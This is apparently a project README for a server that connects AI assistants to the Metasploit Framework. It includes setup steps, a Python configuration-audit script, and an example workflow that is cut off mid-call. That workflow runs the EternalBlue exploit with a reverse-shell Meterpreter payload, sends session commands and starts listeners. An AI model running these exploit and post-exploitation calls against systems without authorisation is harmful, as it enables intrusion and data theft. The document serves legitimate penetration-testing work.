About
Metasploit MCP Server is a bridge that connects AI assistants to the Metasploit Framework penetration testing platform through the Model Context Protocol. It exposes Metasploit's RPC functionality as standardized tools, enabling natural language control of complex security testing workflows.
Key capabilities include:
- **Module Discovery**: Search and list available exploit, payload, auxiliary, and post-exploitation modules with platform and architecture filtering
- **Exploit Execution**: Configure and run exploits against targets with optional safety checks before deployment
- **Payload Generation**: Create custom payload files for specific platforms and architectures using the Metasploit RPC
- **Session Management**: Inspect active sessions, execute commands in shell or Meterpreter sessions, and terminate connections
- **Handler Control**: Start multi/handlers to receive connections, view active listeners, and manage background jobs
The server connects to a running Metasploit RPC daemon (msfrpcd) and supports both HTTP/SSE and STDIO transport modes for integration with Claude Desktop and other MCP clients.
README
Metasploit MCP Server
A Model Context Protocol (MCP) server for Metasploit Framework integration.
https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1
Description
This MCP server provides a bridge between large language models like Claude and the Metasploit Framework penetration testing platform. It allows AI assistants to dynamically access and control Metasploit functionality through standardized tools, enabling a natural language interface to complex security testing workflows.
Features
Module Information
Exploitation Workflow
Payload Generation
Session Management
Handler Management
Prerequisites
Installation
1. Clone this repository
2. Install dependencies:
pip install -r requirements.txt
3. Configure environment variables (optional):
MSF_PASSWORD=yourpassword
MSF_SERVER=127.0.0.1
MSF_PORT=55553
MSF_SSL=false
PAYLOAD_SAVE_DIR=/path/to/save/payloads # Optional: Where to save generated payloads
Usage
Start the Metasploit RPC service:
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553
Transport Options
The server supports two transport methods:
You can explicitly select the transport mode using the --transport flag:
# Run with HTTP/SSE transport (default)
python MetasploitMCP.py --transport http
# Run with STDIO transport
python MetasploitMCP.py --transport stdio
Additional options for HTTP mode:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
Claude Desktop Integration
For Claude Desktop integration, configure claude_desktop_config.json:
{
  "mcpServers": {
    "metasploit": {
      "command": "uv",
      "args": [
        "--directory",
        "C:\\path\\to\\MetasploitMCP",
        "run",
        "MetasploitMCP.py",
        "--transport",
        "stdio"
      ],
      "env": {
        "MSF_PASSWORD": "yourpassword"
      }
    }
  }
}
Other MCP Clients
For other MCP clients that use HTTP/SSE:
1. Start the server in HTTP mode:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
2. Configure your MCP client to connect to:
- SSE endpoint: http://your-server-ip:8085/sse
Security Considerations
⚠️ IMPORTANT SECURITY WARNING:
This tool provides direct access to Metasploit Framework capabilities, which include powerful exploitation features. Use responsibly and only in environments where you have explicit permission to perform security testing.
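A pre-flight check for the settings this README shows, as an added example that is not part of the MetasploitMCP project: it flags the sample password left in place, an RPC connection to a non-loopback `MSF_SERVER` with SSL off, and an HTTP/SSE listener bound to all interfaces with `--host 0.0.0.0`. The `audit` function and its finding codes are hypothetical names, and it assumes that unset variables behave like the README's sample values and that only `true`, `1` or `yes` enable `MSF_SSL`.

```python
import argparse
import ipaddress

# The README's sample password, plus "unset": neither should reach a real deployment.
PLACEHOLDER_PASSWORDS = {"", "yourpassword"}


def _ip_flag(host, attr):
    """Return ipaddress attribute `attr` for an IP literal, False for anything else."""
    try:
        return getattr(ipaddress.ip_address(host), attr)
    except ValueError:
        return False  # hostnames are not IP literals


def audit(env, server_args):
    """Return finding codes (hypothetical names) for env vars and MetasploitMCP.py args."""
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument("--transport", default="http")  # README: HTTP/SSE is the default
    parser.add_argument("--host")
    args, _ = parser.parse_known_args(server_args)

    findings = []
    if env.get("MSF_PASSWORD", "") in PLACEHOLDER_PASSWORDS:
        findings.append("placeholder-rpc-password")

    # Assumption: unset variables behave like the README's sample values.
    rpc_host = env.get("MSF_SERVER", "127.0.0.1")
    ssl_on = env.get("MSF_SSL", "false").strip().lower() in ("1", "true", "yes")
    local = rpc_host.lower() == "localhost" or _ip_flag(rpc_host, "is_loopback")
    if not ssl_on and not local:
        findings.append("cleartext-rpc-to-remote-host")

    # 0.0.0.0 (or ::) makes the HTTP/SSE endpoint reachable on every interface.
    if args.transport == "http" and args.host and _ip_flag(args.host, "is_unspecified"):
        findings.append("mcp-http-on-all-interfaces")
    return findings


if __name__ == "__main__":
    # Constructed input: the README's sample environment and HTTP-mode command line.
    sample_env = {"MSF_PASSWORD": "yourpassword", "MSF_SERVER": "127.0.0.1", "MSF_SSL": "false"}
    sample_args = ["--transport", "http", "--host", "0.0.0.0", "--port", "8085"]
    for finding in audit(sample_env, sample_args):
        print(finding)
```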
Example Workflows
Basic Exploitation
1. List available exploits: list_exploits("ms17_010")
2. Select and run an exploit: run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})
3. List sessions: list_active_sessions()
4. Run commands: send_session_command(1, "whoami")
Post-Exploitation
1. Run a post module: run_post_module("windows/gather/enum_logged_on_users", 1)
2. Send custom commands: send_session_command(1, "sysinfo")
3. Terminate when done: terminate_session(1)
Handler Management
1. Start a listener: start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)
2. List active handlers: list_listeners()
3. Generate a payload: `generate_payload("